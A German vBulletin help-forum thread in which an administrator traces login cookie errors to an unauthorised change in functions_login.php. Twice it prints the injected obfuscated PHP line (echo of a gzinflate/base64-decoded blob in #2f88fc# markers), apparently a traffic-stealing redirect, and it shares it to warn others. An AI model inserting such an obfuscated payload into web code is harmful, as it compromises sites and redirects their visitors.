Ergebnis 1 bis 6 von 6

Thema: Fehlermeldung bein Log In (Cookies)

Neuer Benutzer

Fehlermeldung bein Log In (Cookies)

Schönen guten Morgen und nachträglich ein frohes Neues Jahr.

Seit gerade eben habe ich bei meinem vBulletin Board ein Problem. Beim Einloggen kommt immer die Fehlermeldung

Die Cookies konnten nicht gesetzt werden, da der Header schon an den Browser geschickt wurde.
    Datei: /customers/d/5/b/fantasy-wrestling.net/httpd.www/vb/includes/functions_login.php
    Zeile: 419
    Während einige user diese Meldung garnicht bekommen und sich normal einloggen können, gibt es dann wieder welche wo die Nachricht zwar kommt, sie sich aber dennoch eingeloggt werden und dann gibt es Benutzer wie mich als Admin, wo ein einloggen nicht mehr möglich ist.

Kann mir jemand sagen wo das Problem am Forum (bisher nie Probleme mit dem Forum gehabt) liegt bzw. wie ich das lösen kann? Scheint ja ein tiefergehendes Problem zu sein, wenn ich mich selber nicht mehr über das Forum einloggen kann (und dadurch logischerweise auch nicht ins AdminCP komme).

schonmal besten Dank für die Mühe,

CeeJay

Neuer Benutzer
    Falls es hilft, die besagte Zeile 419 sagt mir folgnedes:

echo(gzinflate(base64_decode("lZFBa8MwDIX/ivClNoy0GzslbaEtu43tstvYwYnlWODGxlbahnX/fQntdiqD3STe+5CetMxNosjrg07QJw8rEI45lvO5Cxy9Hh4eiw5ZVGRByk4fqNUcUtFnTJsWOy44PIcjpp3OKFVBncHTq5VinwmFgvUKFgrOZ/gPaymhDacfXH0CwLSgHdczoen3E9sk1IxPHqdOzsgmvceZqkavLTLyhjlR3TNKcSTDTtyBuBc3dYfUOv7DkFMzquN9bqs8eJzoA2WqyRMPJTgyBrsKYsjEFLoSdJ2DH4EKPFouYRG5Ag7xUl0G/6Zrka/R8nZ40+3LGE6KOphBqPfFR6FjxM7sHHkjraq+lvPrI78B")));
    Einige user, die eingeloggt sind, können sich auch gerade nicht mehr ausloggen.
    Laut meinem FTP Zugang wurde die functions_login.php gestern abend um 21:33 Uhr verändert (aber nicht von mir).

Ich bin jetzt langsam ziemlich ratlos und verzweifelt

vB-Guru
    Komisch. Lade mal die Datei neu hoch.

Neuer Benutzer
    War wohl gehacked worden. Habe von anderen Usern meines Boards (die darin bewandert sind), gemeldet bekommen, das dieses Problem auch andere Boards betrifft. Scheinbar ist eine Seite namens hotplay24.net dafür mit veranwortlich, die vor allem "private" Server angreifen um Traffic zu klauen. Einloggen kann ich mich jetzt wieder, nachdem ich besagte Zeile einfach (samt Vorbefehl und Endbefel eine Zeile davor und danach) gelöscht habe. Scheinbar ist die Boardseite "Archiv" bei mir noch betroffen, da man nach dem klick nach wenigen Sekunden noch auf die Seite geleitet wird.

Mensch, mensch. Einige Hacker haben auch nichts besseres zu tun, als kleine Leute zu ärgern -_-

vB-Guru
    Nimm das Forum erst einmal Offline! Bevor du das Problem nicht gefunden hast, solltest du das Forum nicht Online lassen.

Lade mal deinen kompletten FTP runter und scanne alle Dateien und Ordner mit einem Virusscanner. Kann sein das evtl. eine Grafik mit Schadcode upgeloadet wurde und so ein Zugang ins Forum ermöglicht wurde. Gibt aber auch 1000 andere Möglichkeiten.

Neuer Benutzer
    Also die gesamte Zeile samt Befehl lautet

#2f88fc#

echo(gzinflate(base64_decode("lZFBa8MwDIX/ivClNoy0GzslbaEtu43tstvYwYnlWODGxlbahnX/fQntdiqD3STe+5CetMxNosjrg07QJw8rEI45lvO5Cxy9Hh4eiw5ZVGRByk4fqNUcUtFnTJsWOy44PIcjpp3OKFVBncHTq5VinwmFgvUKFgrOZ/gPaymhDacfXH0CwLSgHdczoen3E9sk1IxPHqdOzsgmvceZqkavLTLyhjlR3TNKcSTDTtyBuBc3dYfUOv7DkFMzquN9bqs8eJzoA2WqyRMPJTgyBrsKYsjEFLoSdJ2DH4EKPFouYRG5Ag7xUl0G/6Zrka/R8nZ40+3LGE6KOphBqPfFR6FjxM7sHHkjraq+lvPrI78B")));

#/2f88fc#
    Falls jemand das Problem wie ich haben sollte: Diese Zeile ist es. Ich werde mich jetzt intensiv mit meinen "Mit Admins" an eine Säuberung setzen. Ich hoffe ich kann mit diesem Thread vielleicht anderen helfen die gerade das gleiche Problem haben.

Aktive Benutzer

Aktive Benutzer